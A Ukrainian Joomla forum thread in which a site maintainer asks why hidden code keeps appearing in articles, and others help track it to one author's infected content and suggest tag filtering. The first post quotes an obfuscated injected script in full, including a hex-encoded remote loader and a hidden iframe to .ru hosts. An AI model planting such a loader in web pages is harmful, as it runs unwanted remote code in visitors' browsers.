Ліва реклама на сайті.

Налаштування Joomla та серверу для безпечної роботи сайту. Взломи та хакерські ходи.
Аватар користувача
Gespenst
Користувач
Користувач
Повідомлень: 112
З нами з: 28 березня 2010, 08:48
Звідки: Кривий Ріг
Дякував (ла): 8 рази
Подякували: 3 рази

Ліва реклама на сайті.

Повідомлення Gespenst » 24 жовтня 2015, 09:44

На одному з сайтів що я іноді обслуговую з’явилася така проблема. Кожен раз при додаванні нового матеріалу там з’являється отакий код

Код: Виділити все

<script>// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["63733867633173656e752e7275"]'),e="",t="20999",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("veskr.com.ua")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
// ]]></script>
<p><iframe id="a1996667054" src="https://cs8gc1senu.ru/f.html" style="display: none;"></iframe></p>
З’являється він не у кожній статті, а через одну або дві після публікації. Ця проблема була і коли сайт був на Joomla 2.5, але я встановив по новій третю версію всі розширення також встановлені по новій єдине що було взяте зі старої версії це таблиці бази даних контенту та коментарів. Сайт перевіряється на віруси регулярно, але перевірки нічого не показують. Де ця фігня можу бути, можливо хтось стикався?

Аватар користувача
Fedik
Користувач
Користувач
Повідомлень: 19
З нами з: 14 липня 2010, 15:41

Ліва реклама на сайті.

Повідомлення Fedik » 24 жовтня 2015, 21:22

а якщо встановити по новій локально, з контентом але без додаткових розширень та шаблонів, і подивитись? ....
якщо все ок, то пробувати встановлювати розширення одне за одним ... та слідкувати після якого розширення той код знову з’явиться
Аватар користувача
Gespenst
Користувач
Користувач
Повідомлень: 112
З нами з: 28 березня 2010, 08:48
Звідки: Кривий Ріг
Дякував (ла): 8 рази
Подякували: 3 рази

Ліва реклама на сайті.

Повідомлення Gespenst » 25 жовтня 2015, 10:11

код з’явився після імпорту таблиць контенту. До цього все було гаразд. Я ставив тестові статті все було чисто. після імпорту старого контенту код з’явився знову.
Аватар користувача
Fedik
Користувач
Користувач
Повідомлень: 19
З нами з: 14 липня 2010, 15:41

Ліва реклама на сайті.

Повідомлення Fedik » 25 жовтня 2015, 11:04

єдине, що спадає на думку, що один або декілька одиниць контенту містять якийсь скрип в тілі, який пізніше відображається на сайті та завантажує додаткову рекламу ... або щось подібне

спробуй пройтись по базі з

Код: Виділити все

SELECT * FROM #__content WHERE introtext LIKE '%script%' OR fulltext LIKE '%script%'
Аватар користувача
Gespenst
Користувач
Користувач
Повідомлень: 112
З нами з: 28 березня 2010, 08:48
Звідки: Кривий Ріг
Дякував (ла): 8 рази
Подякували: 3 рази

Ліва реклама на сайті.

Повідомлення Gespenst » 25 жовтня 2015, 12:56

дякую! Зроблю - одпишуся

Відправлено через 26 хвилини 58 секунди:
помилку видає, на синтаксис гарчить

Аватар користувача
Fedik
Користувач
Користувач
Повідомлень: 19
З нами з: 14 липня 2010, 15:41

Ліва реклама на сайті.

Повідомлення Fedik » 25 жовтня 2015, 14:51

писав по пам’яті, тому може бути щось пропустив :)
також в "#__content" потрібно замінити #_ на коректний префікс, якщо префікс "wqe" то буде "wqe_content"
Аватар користувача
Gespenst
Користувач
Користувач
Повідомлень: 112
З нами з: 28 березня 2010, 08:48
Звідки: Кривий Ріг
Дякував (ла): 8 рази
Подякували: 3 рази

Ліва реклама на сайті.

Повідомлення Gespenst » 29 жовтня 2015, 13:07

Наче вичистив, дякую. До речі, помітив, що ця проблема виникає тільки в одного автора. Тільки його матеріали завірушені. Решта авторів такої проблеми не мають.
Аватар користувача
Fedik
Користувач
Користувач
Повідомлень: 19
З нами з: 14 липня 2010, 15:41

Ліва реклама на сайті.

Повідомлення Fedik » 29 жовтня 2015, 13:38

то було б добре поговорити з тим автором, можливо там купа вірусів на ПК або робить це навмисно :)
Аватар користувача
Gespenst
Користувач
Користувач
Повідомлень: 112
З нами з: 28 березня 2010, 08:48
Звідки: Кривий Ріг
Дякував (ла): 8 рази
Подякували: 3 рази

Ліва реклама на сайті.

Повідомлення Gespenst » 29 жовтня 2015, 13:42

навмисно виключається, там дідусь який полюбляє закласти за комірець, він би до такого недопер. а віруси - це аж бігом. Та редактор вирішив його звільнити. Тож проблему знищено!

Аватар користувача
Dutch
Адміністратор
Адміністратор
Повідомлень: 1187
З нами з: 28 жовтня 2006, 18:49
Звідки: Київ
Дякував (ла): 3 рази
Подякували: 12 рази
Контактна інформація:

Ліва реклама на сайті.

Повідомлення Dutch » 02 листопада 2015, 10:53

Щоб такого не було краще налаштувати в загальній конфігурації Joomla («Текстовий фільтр») білий та чорний списки.

Тобто для певних груп користувачів ви можете налаштувати які теги допускати, а які ні. Але будьте обережними, бо потім автори вас замучають :)

Краще створити власний чорний список і прописати туди тег скрипта, можливо фреймів...
Аватар користувача
Gespenst
Користувач
Користувач
Повідомлень: 112
З нами з: 28 березня 2010, 08:48
Звідки: Кривий Ріг
Дякував (ла): 8 рази
Подякували: 3 рази

Ліва реклама на сайті.

Повідомлення Gespenst » 02 листопада 2015, 12:13

Dutch писав:Джерело цитати Щоб такого не було краще налаштувати в загальній конфігурації Joomla («Текстовий фільтр») білий та чорний списки.
Дякую за пораду. Поекспериментую.
Аватар користувача
Dutch
Адміністратор
Адміністратор
Повідомлень: 1187
З нами з: 28 жовтня 2006, 18:49
Звідки: Київ
Дякував (ла): 3 рази
Подякували: 12 рази
Контактна інформація:

Ліва реклама на сайті.

Повідомлення Dutch » 23 грудня 2015, 01:20

Вдалося фільтри налаштувати?

Аватар користувача
Gespenst
Користувач
Користувач
Повідомлень: 112
З нами з: 28 березня 2010, 08:48
Звідки: Кривий Ріг
Дякував (ла): 8 рази
Подякували: 3 рази

Ліва реклама на сайті.

Повідомлення Gespenst » 23 грудня 2015, 07:32

проблема зникла сама собою. Зараз там інша людина ставить матеріали і жодних проблем не виникає.
svetik.dor.88
Користувач
Користувач
Повідомлень: 2
З нами з: 10 січня 2017, 11:39

Ліва реклама на сайті.

Повідомлення svetik.dor.88 » 10 січня 2017, 11:45

в мене було щось подiбнеЗображення


  • Similar Topics
    Відповіді
    Перегляди
    Останнє повідомлення

Повернутись до “Безпека сервера (хостингу) та сайту”

Хто зараз онлайн

Зараз переглядають цей форум: 1 і 0 гість